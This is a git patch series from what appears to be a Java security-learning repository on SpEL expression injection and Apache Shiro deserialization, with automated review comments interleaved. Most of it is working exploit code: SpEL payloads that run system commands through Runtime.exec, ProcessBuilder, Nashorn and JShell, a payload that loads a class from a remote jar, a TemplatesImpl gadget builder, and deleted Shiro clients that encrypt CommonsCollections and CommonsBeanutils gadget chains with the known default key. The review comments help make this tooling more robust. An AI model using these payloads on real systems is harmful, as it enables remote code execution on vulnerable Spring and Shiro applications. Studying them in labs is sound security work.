diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/aaa/bbb/Exp.class" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/aaa/bbb/Exp.class" new file mode 100644 index 0000000000000000000000000000000000000000..d546b9c78a6caf71336e16de5389aef6fbf24ed0 GIT binary patch literal 595 zcmZWm$xg#C6db2*oVF=T%Ubq51w<~~KwJ<=NNgeqRB>{GRRT1rLJIvO&RhV2fIA-r zJXb6Q63Nz^@ys}r*SCjf0E;MPkVQ`hz3AiUH&8S%pr%2NA&%h;42*D$a*Q$P%YNX; zD-7M%=Bc<8_PGcuwi8EwP+2M+FeF#QW699I=?8MVUUg-(FWhrNa!xF~vn^3;&P~65 z3Sh`MVLkHXy01Ot&R=9*/ + public static void jShell(){ + String cmdStr = "T(SomeWhitelistedClassNotPartOfJDK).ClassLoader.loadClass(\"jdk.jshell.JShell\",true).Methods[6].invoke(null,{}).eval(\"T(Runtime).getRuntime().exec('whoami')\").toString()"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() ); + } + + /*缺点:只能读一行*/ + public static void br(){ + String cmdStr = "new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(\"cmd\", \"/c\", \"whoami\").start().getInputStream(), \"gbk\")).readLine()\n"; + + ExpressionParser parser = new SpelExpressionParser(); + Expression exp = parser.parseExpression(cmdStr); + System.out.println( exp.getValue() ); + } + + /*useDelimiter内的参数为分割标志,所以随便填一个,这样回显结果才完整*/ + public static void scanner(){ + String cmdStr = "new java.util.Scanner(new java.lang.ProcessBuilder(\"cmd\", \"/c\", \"dir\", \".\").start().getInputStream(), \"GBK\").useDelimiter(\"asfsfsdfsf\").next()\n"; + + ExpressionParser parser = new SpelExpressionParser(); + Expression exp = parser.parseExpression(cmdStr); + System.out.println( exp.getValue() ); + } + } 
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" index d1f8e0d..942ade1 100644 --- "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" 
@@ -1,4 +1,73 @@ package com.test; +import org.springframework.expression.Expression; +import org.springframework.expression.ExpressionParser; +import org.springframework.expression.spel.standard.SpelExpressionParser; + +import javax.script.ScriptEngineFactory; +import javax.script.ScriptEngineManager; +import java.util.List; + +// 如果使用非默认ParserContext,所有payload用#{}包裹 public class RcePart1 { + public static void main(String[] args) { +// pb(); +// runtime(); +// getEngineFactory(); +// nashorn(); + javascript(); + } + + public static void pb() { + String cmdStr = "new java.lang.ProcessBuilder(new String[]{'calc'}).start()"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() );//弹出计算器 + } + + public static void runtime() { + String cmdStr = "T(Runtime).getRuntime().exec(new String[]{'cmd.exe', '/c', 'notepad'})"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() ); + } + + public static void getEngineFactory() { + ScriptEngineManager manager = new ScriptEngineManager(); + List factories = manager.getEngineFactories(); + for (ScriptEngineFactory factory: factories){ + System.out.printf( + "Name: %s%n" + "Version: %s%n" + "Language name: %s%n" + + "Language version: %s%n" + + "Extensions: %s%n" + + "Mime types: %s%n" + + "Names: %s%n", + factory.getEngineName(), + factory.getEngineVersion(), + factory.getLanguageName(), + factory.getLanguageVersion(), + factory.getExtensions(), + factory.getMimeTypes(), + factory.getNames() + ); + } + } + + public static void nashorn(){ + String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + 
System.out.println( exp.getValue() );//弹出计算器 + } + + public static void javascript(){ + String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"javascript\").eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() );//弹出计算器 + } } diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" index 5f1f32c..dcbe6df 100644 --- "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" 
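Review bot: `getEngineFactory` declares `List factories` as a raw type, so the enhanced-for over `ScriptEngineFactory` compiles only through an unchecked conversion; `getEngineFactories()` already returns `List<ScriptEngineFactory>`, so `List<ScriptEngineFactory> factories = manager.getEngineFactories();` removes the warning with no other change. The `pb`, `runtime`, `nashorn` and `javascript` methods repeat the same three-line parse-and-evaluate sequence with the same inline comments; one private helper taking the expression string would leave each of them a single line and put the `//创建解析器`/`//解析表达式` explanation in one place. The header comment `// 如果使用非默认ParserContext,所有payload用#{}包裹` is the file's only documentation; an English rendering such as `// With a non-default ParserContext every expression must be wrapped in #{}` keeps it readable for the wider audience.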
@@ -1,4 +1,45 @@ package com.test; +import org.springframework.expression.Expression; +import org.springframework.expression.ExpressionParser; +import org.springframework.expression.spel.standard.SpelExpressionParser; + public class RcePart2 { + public static void main(String[] args) { +// urlLoader(); +// appLoader(); + getAppFromOtherClass(); + } + + /*打包jar时,如果类在多层包中,打包时一定要把前面几层文件夹也打包进行,jar打开应该是aaa/bbb/Exp.class的形式,这样才能正常loadClass*/ + public static void urlLoader(){ + String cmdStr = "new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\"http://127.0.0.1:7777/Exp.jar\")}).loadClass(\"aaa.bbb.Exp\").getConstructors()[0].newInstance(\"calc\")"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() ); + } + + public static void appLoader(){ + String cmdStr = "T(ClassLoader).getSystemClassLoader().loadClass(\"java.lang.Runtime\").getRuntime().exec('calc')"; + + ExpressionParser parser = new SpelExpressionParser(); + Expression exp = parser.parseExpression(cmdStr); + System.out.println( exp.getValue() ); + } + + /*我这里利用失败了*/ + public static void getAppFromOtherClass(){ + String cmdStr = "T(org.springframework.expression.Expression).getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"calc\")"; + + ExpressionParser parser = new SpelExpressionParser(); + Expression exp = parser.parseExpression(cmdStr); + System.out.println( exp.getValue() ); + } + + /*有web上下文的环境使用。不过我本地测试全失败了。而且不知道为什么文章里要加[[${}]]*/ + public static void getUrlFromInnerClass(){ + String cmdStr1 = "#request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"calc\")"; + String cmdStr2 = "username[#this.getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"java.lang.Runtime.getRuntime().exec('xterm')\")]=asdf"; + } } 
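Review bot: `getUrlFromInnerClass` assigns `cmdStr1` and `cmdStr2` and never reads them, so the method is a no-op that only produces unused-variable warnings; the comment above it already says these variants did not work locally, and a comment block is the better place to park such notes than dead locals. `main` toggles between `urlLoader`, `appLoader` and `getAppFromOtherClass` by commenting calls in and out; reading the choice from `args` with a short usage message would make the entry point self-describing. The three live methods also duplicate the parse-and-evaluate sequence, which a single private helper would remove.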
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java"
new file mode 100644
index 0000000..b9c3df7
--- /dev/null
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java"
@@ -0,0 +1,11 @@
+package com.test;
+
+import org.springframework.expression.Expression;
+
+public class tmp {
+ public static void main(String[] args) throws ClassNotFoundException {
+ ClassLoader classLoader = Expression.class.getClassLoader();
+ System.out.println(classLoader);
+ Class aClass = ClassLoader.getSystemClassLoader().loadClass("java.lang.Runtime");
+ }
+}
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml"
new file mode 100644
index 0000000..4bd7209
--- /dev/null
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml"
@@ -0,0 +1,6 @@ + + + + \ No newline at end of file
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml"
index e69de29..9899989 100644
--- "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml"
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml"
@@ -0,0 +1,2 @@
+server:
+ port: 8083
\ No newline at end of file
From 295f4e437bb0a8fd30e3f5dfeacf77a5b2bc0fe0 Mon Sep 17 00:00:00 2001
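Review bot: `Class aClass` in `main` is a raw type and the variable is never read afterwards; `Class<?>` is the parameterized form, and if the call only exists to see whether the lookup throws, the bare statement `ClassLoader.getSystemClassLoader().loadClass("java.lang.Runtime");` says that without an unused local. A one-line comment at the top of `main` stating what the two printed/loaded values are meant to compare (the loader that defined `Expression` against the system loader) would make this scratch file readable on its own.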
From: 1diot9 <2868944833@qq.com> Date: Thu, 23 Oct 2025 17:54:37 +0800 Subject: [PATCH 11/16] =?UTF-8?q?doc:=E6=9B=B4=E6=96=B0shiro?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 46 +++++++-- shiro/shiroDeser/CalcAbs.class | Bin 0 -> 1501 bytes shiro/shiroDeser/python/enc_dec.py | 0 .../shiroDeser/src/main/java/com/exp/CB.java | 4 + .../src/main/java/com/exp/KeyDetect.java | 4 + .../src/main/java/com/exp/TemplatesGen.java | 54 ++++++++++ .../main/java/com/test/WebApplication.java | 4 + .../java/com/test/config/ShiroConfig.java | 4 + .../main/java/com/test/config/UserRealm.java | 4 + .../com/test/controller/LoginController.java | 4 + .../src/main/resources/application.yml | 0 .../src/main/resources/templates/home.html | 10 ++ .../src/main/resources/templates/login.html | 14 +++ shiro/shiroattack/pom.xml | 96 ------------------ shiro/shiroattack/shiroattack.iml | 2 - .../java/com/govuln/shiroattack/Client.java | 20 ---- .../java/com/govuln/shiroattack/Client0.java | 15 --- .../java/com/govuln/shiroattack/Client1.java | 20 ---- .../shiroattack/CommonsBeanutils1Shiro.java | 43 -------- .../shiroattack/CommonsCollections6.java | 55 ---------- .../shiroattack/CommonsCollectionsShiro.java | 51 ---------- .../java/com/govuln/shiroattack/Evil.java | 19 ---- .../main/resources/templates/payload.html" | 10 ++ 23 files changed, 148 insertions(+), 331 deletions(-) create mode 100644 shiro/shiroDeser/CalcAbs.class create mode 100644 shiro/shiroDeser/python/enc_dec.py create mode 100644 shiro/shiroDeser/src/main/java/com/exp/CB.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java create mode 100644 shiro/shiroDeser/src/main/java/com/test/WebApplication.java create mode 100644 shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java create mode 100644 shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java 
create mode 100644 shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java create mode 100644 shiro/shiroDeser/src/main/resources/application.yml create mode 100644 shiro/shiroDeser/src/main/resources/templates/home.html create mode 100644 shiro/shiroDeser/src/main/resources/templates/login.html delete mode 100644 shiro/shiroattack/pom.xml delete mode 100644 shiro/shiroattack/shiroattack.iml delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html" diff --git a/README.md b/README.md index d036f36..850e8da 100644 --- a/README.md +++ b/README.md @@ -87,6 +87,14 @@ +
+ +# JavaWeb基础 + +待完善。。。 + + +
# 代码 / jar包调试 @@ -283,11 +291,17 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 ====================shiro反序列化快速入门的话,可以只看上面的====================== +[全版本Shiro反序列化漏洞原理详解 - Smile3306 - 博客园](https://www.cnblogs.com/Smile3306/p/18984943) 详细梳理了加密和利用原理 + +[CBC字节翻转攻击&Padding Oracle Attack原理解析 - 枫のBlog](https://goodapple.top/archives/217) 721构造合法密文的具体原理 + [Shiro RememberMe 漏洞检测的探索之路 - CT Stack 安全社区](https://stack.chaitin.com/techblog/detail/39) 通过密钥正常错误时,回显中rememberMe字段的不同来实现密钥爆破 -[一种另类的 shiro 检测方式](https://mp.weixin.qq.com/s/do88_4Td1CSeKLmFqhGCuQ) +[奇安信攻防社区-一种另类的shiro检测方式](https://forum.butian.net/share/92) -[Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面还提到pen4uin师傅的文章,也可以去看看 +[Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面提到的文章都要看 + +[终极Java反序列化Payload缩小技术](https://mp.weixin.qq.com/s/cQCYhBkR95vIVBicA9RR6g)
@@ -407,8 +421,6 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
-## - # 表达式+SSTI ## SPEL @@ -489,14 +501,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 -# JavaWeb基础 - -待完善。。。 - -
- # 代码审计 [Java安全慢游记](https://www.yuque.com/pmiaowu/gpy1q8) 非常好整理,强烈推荐,有基础也有例子,还讲了Tabby和CodeQL在审计中的运用 @@ -625,6 +631,26 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
+# 博客&公众号整理 + +整理一些我经常看的博客和公众号,仅根据个人主观收录,可能有很多其他优秀的没收录 + +## 博客 + +[Archives | Bmth's blog](http://www.bmth666.cn/archives/) + +[Y4tacker:Hacking The World!](https://y4tacker.github.io/) + + + + + +## 公众号 + +漫漫安全路 + + + # 工具推荐 [vulhub/java-chains: Vulhub Vulnerability Reproduction Designated Platform](https://github.com/vulhub/java-chains) 利用链神器 diff --git a/shiro/shiroDeser/CalcAbs.class b/shiro/shiroDeser/CalcAbs.class new file mode 100644 index 0000000000000000000000000000000000000000..d22b012393dec8d0ee894fbc0feb33f2d3aa2aa9 GIT binary patch literal 1501 zcmbtUT~8B16g|@xwp}Vn3;3;|A_ax<10PI{Qb8k05hDa+cpA228M7Z`c4``bkng^T z(ZnC%k22obF0_d?#gNVH?7esHxo6JanP0!Z{{*m%Wfu-+UEIQ49u+&!J6Lcrgjol- z8HOLLP?;wT*~V+VIAX0!<7_mK`5K3D2q6!5qe@<=ziI1t{xwC((=_>((JE{v|12kTlggF*gc+D|utd$d6}7Y{Untwr#k6Uc zEL;(J6ddp(?&2O5qh9xlxQ_?)JJNLwD<|z<-3pBgB&Q=m?eCdwdj@<-?Nm;8jM<)e70_w@_ASP<`c*naMz3Gsl-8ZE8sjL@+v2V#UVwF>hLg0h1Y&_wD40UnuQDc*IKw2SsJQi=!+9!i zVK0!!!ak*83H=3IN?@lu!M?B;afv{V*j^?DuHb44Tcg>QEd0RGyF(1uyR6+LFhP<{ gCM7!D3b=-8O2`wt8IpmnVzR6Z*J<3K?+kAK0g_;WSO5S3 literal 0 HcmV?d00001 diff --git a/shiro/shiroDeser/python/enc_dec.py b/shiro/shiroDeser/python/enc_dec.py new file mode 100644 index 0000000..e69de29 diff --git a/shiro/shiroDeser/src/main/java/com/exp/CB.java b/shiro/shiroDeser/src/main/java/com/exp/CB.java new file mode 100644 index 0000000..a7a6436 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/CB.java @@ -0,0 +1,4 @@ +package com.exp; + +public class CB { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java b/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java new file mode 100644 index 0000000..df209a5 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java @@ -0,0 +1,4 @@ +package com.exp; + +public class KeyDetect { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java b/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java new file mode 100644 index 0000000..81daacd --- /dev/null 
+++ b/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java
@@ -0,0 +1,54 @@
+package tools;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+
+import javax.xml.transform.Templates;
+import java.io.*;
+import java.lang.reflect.Field;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+public class TemplatesGen {
+ public static Templates getTemplates(String bytePath) throws IOException, IllegalAccessException {
+ byte[] bytes = Files.readAllBytes(Paths.get(bytePath));
+ TemplatesImpl templates = new TemplatesImpl();
+ setFieldValue(templates, "_name", "1diot9");
+ setFieldValue(templates, "_class", null);
+ setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
+ setFieldValue(templates, "_bytecodes", new byte[][]{bytes});
+
+ return templates;
+ }
+
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException {
+ Class aClass = obj.getClass();
+ Field field = null;
+ try {
+ field = aClass.getDeclaredField(fieldName);
+ } catch (NoSuchFieldException e) {
+ aClass = aClass.getSuperclass();
+ }
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static byte[] ser2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(obj);
+ return baos.toByteArray();
+ }
+
+ public static void ser2file(Object obj, String fileName) throws IOException {
+ FileOutputStream fos = new FileOutputStream(fileName);
+ ObjectOutputStream oos = new ObjectOutputStream(fos);
+ oos.writeObject(obj);
+ }
+
+ public static Object deser(byte[] bytes) throws IOException, ClassNotFoundException {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ ObjectInputStream ois = new ObjectInputStream(bais);
+ return ois.readObject();
+ }
+}
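Review bot: The file is added under `shiro/shiroDeser/src/main/java/com/exp/` but its first line declares `package tools;`, which does not match the directory; the compiled class will land in `tools/`, IDEs flag the mismatch, and the sibling classes added in this commit (`CB`, `KeyDetect`) use `package com.exp;`, which is what this line should read too. In `setFieldValue`, the `catch (NoSuchFieldException e)` branch moves `aClass` to its superclass but never retries the lookup, so `field` stays null and the following `field.setAccessible(true)` throws `NullPointerException` for any inherited field; the lookup should walk `getSuperclass()` until it finds the field and fail with a clear message otherwise. `ser2file` neither flushes nor closes its `FileOutputStream`/`ObjectOutputStream`, so the written file can be left incomplete, and `ser2bytes`/`deser` leave their streams open as well — try-with-resources fixes all three. `deser` calls `readObject()` with no `ObjectInputFilter`; a comment that this helper is only for round-tripping locally generated bytes and must never be fed untrusted input belongs on it.
```java
    public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException {
        Field field = null;
        // walk up the class hierarchy instead of giving up after the first miss
        for (Class<?> c = obj.getClass(); c != null && field == null; c = c.getSuperclass()) {
            try {
                field = c.getDeclaredField(fieldName);
            } catch (NoSuchFieldException ignored) {
                // not declared on this class; try the superclass
            }
        }
        if (field == null) {
            throw new IllegalArgumentException("no field '" + fieldName + "' in " + obj.getClass().getName());
        }
        field.setAccessible(true);
        field.set(obj, value);
    }

    // … unchanged: ser2bytes (same try-with-resources treatment applies) …

    public static void ser2file(Object obj, String fileName) throws IOException {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(fileName))) {
            oos.writeObject(obj);
        }
    }

    public static Object deser(byte[] bytes) throws IOException, ClassNotFoundException {
        // Local round-trip helper with no ObjectInputFilter: only for bytes this tool produced itself.
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            return ois.readObject();
        }
    }
```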
diff --git a/shiro/shiroDeser/src/main/java/com/test/WebApplication.java b/shiro/shiroDeser/src/main/java/com/test/WebApplication.java new file mode 100644 index 0000000..ebd52a5 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/WebApplication.java @@ -0,0 +1,4 @@ +package com.test; + +public class WebApplication { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java b/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java new file mode 100644 index 0000000..8188334 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java @@ -0,0 +1,4 @@ +package com.test.config; + +public class ShiroConfig { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java b/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java new file mode 100644 index 0000000..6389c4f --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java @@ -0,0 +1,4 @@ +package com.test.config; + +public class UserRealm { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java b/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java new file mode 100644 index 0000000..2a8f913 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java @@ -0,0 +1,4 @@ +package com.test.controller; + +public class LoginController { +} diff --git a/shiro/shiroDeser/src/main/resources/application.yml b/shiro/shiroDeser/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 diff --git a/shiro/shiroDeser/src/main/resources/templates/home.html b/shiro/shiroDeser/src/main/resources/templates/home.html new file mode 100644 index 0000000..d6ef988 --- /dev/null +++ b/shiro/shiroDeser/src/main/resources/templates/home.html @@ -0,0 +1,10 @@ + + + + Home + + +

Welcome, You are logged in!

+Logout + + diff --git a/shiro/shiroDeser/src/main/resources/templates/login.html b/shiro/shiroDeser/src/main/resources/templates/login.html new file mode 100644 index 0000000..ac0fd72 --- /dev/null +++ b/shiro/shiroDeser/src/main/resources/templates/login.html @@ -0,0 +1,14 @@ + + + + Login + + +
+
+
+ +
+

Invalid credentials

+ + diff --git a/shiro/shiroattack/pom.xml b/shiro/shiroattack/pom.xml deleted file mode 100644 index cbf7952..0000000 --- a/shiro/shiroattack/pom.xml +++ /dev/null @@ -1,96 +0,0 @@ - - - - 4.0.0 - - com.govuln - shiroattack - 1.0-SNAPSHOT - - shiroattack - - http://www.example.com - - - UTF-8 - 1.8 - 1.8 - - - - - org.apache.shiro - shiro-core - 1.2.4 - - - - org.javassist - javassist - 3.27.0-GA - - - - commons-collections - commons-collections - 3.2.1 - - - - - - - - - maven-clean-plugin - 3.1.0 - - - - maven-resources-plugin - 3.0.2 - - - maven-compiler-plugin - 3.8.0 - - - maven-surefire-plugin - 2.22.1 - - - maven-jar-plugin - 3.0.2 - - - maven-install-plugin - 2.5.2 - - - maven-deploy-plugin - 2.8.2 - - - - maven-site-plugin - 3.7.1 - - - maven-project-info-reports-plugin - 3.0.0 - - - - - - org.apache.maven.plugins - maven-compiler-plugin - - 8 - 8 - - - - - diff --git a/shiro/shiroattack/shiroattack.iml b/shiro/shiroattack/shiroattack.iml deleted file mode 100644 index 78b2cc5..0000000 --- a/shiro/shiroattack/shiroattack.iml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java deleted file mode 100644 index 12d86a5..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java +++ /dev/null 
@@ -1,20 +0,0 @@ -package com.govuln.shiroattack; - -import javassist.ClassPool; -import javassist.CtClass; -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client { - public static void main(String []args) throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); - byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); - - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java deleted file mode 100644 index 177dec5..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java +++ /dev/null @@ -1,15 +0,0 @@ -package com.govuln.shiroattack; - -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client0 { - public static void main(String []args) throws Exception { - byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java deleted file mode 100644 index 4f59ed8..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java +++ /dev/null 
@@ -1,20 +0,0 @@
-package com.govuln.shiroattack;
-
-import javassist.ClassPool;
-import javassist.CtClass;
-import org.apache.shiro.crypto.AesCipherService;
-import org.apache.shiro.util.ByteSource;
-
-public class Client1 {
- public static void main(String []args) throws Exception {
- ClassPool pool = ClassPool.getDefault();
- CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName());
- byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());
-
- AesCipherService aes = new AesCipherService();
- byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
-
- ByteSource ciphertext = aes.encrypt(payloads, key);
- System.out.printf(ciphertext.toString());
- }
-}
diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java
deleted file mode 100644
index d7fcdd4..0000000
--- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java
+++ /dev/null
@@ -1,43 +0,0 @@
-package com.govuln.shiroattack;
-
-import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
-import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
-import org.apache.commons.beanutils.BeanComparator;
-
-import java.io.ByteArrayOutputStream;
-import java.io.ObjectOutputStream;
-import java.lang.reflect.Field;
-import java.util.PriorityQueue;
-
-public class CommonsBeanutils1Shiro {
- public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
- Field field = obj.getClass().getDeclaredField(fieldName);
- field.setAccessible(true);
- field.set(obj, value);
- }
-
- public byte[] getPayload(byte[] clazzBytes) throws Exception {
- TemplatesImpl obj = new TemplatesImpl();
- setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
- setFieldValue(obj, "_name", "HelloTemplatesImpl");
- setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
-
- final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
- final PriorityQueue queue = new PriorityQueue(2, comparator);
- // stub data for replacement later
- queue.add("1");
- queue.add("1");
-
- setFieldValue(comparator, "property", "outputProperties");
- setFieldValue(queue, "queue", new Object[]{obj, obj});
-
- // ==================
- // 生成序列化字符串
- ByteArrayOutputStream barr = new ByteArrayOutputStream();
- ObjectOutputStream oos = new ObjectOutputStream(barr);
- oos.writeObject(queue);
- oos.close();
-
- return barr.toByteArray();
- }
-}
diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java
deleted file mode 100644
index 7bb2cc9..0000000
--- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java
+++ /dev/null
@@ -1,55 +0,0 @@
-package com.govuln.shiroattack;
-
-import org.apache.commons.collections.Transformer;
-import org.apache.commons.collections.functors.ChainedTransformer;
-import org.apache.commons.collections.functors.ConstantTransformer;
-import org.apache.commons.collections.functors.InvokerTransformer;
-import org.apache.commons.collections.keyvalue.TiedMapEntry;
-import org.apache.commons.collections.map.LazyMap;
-
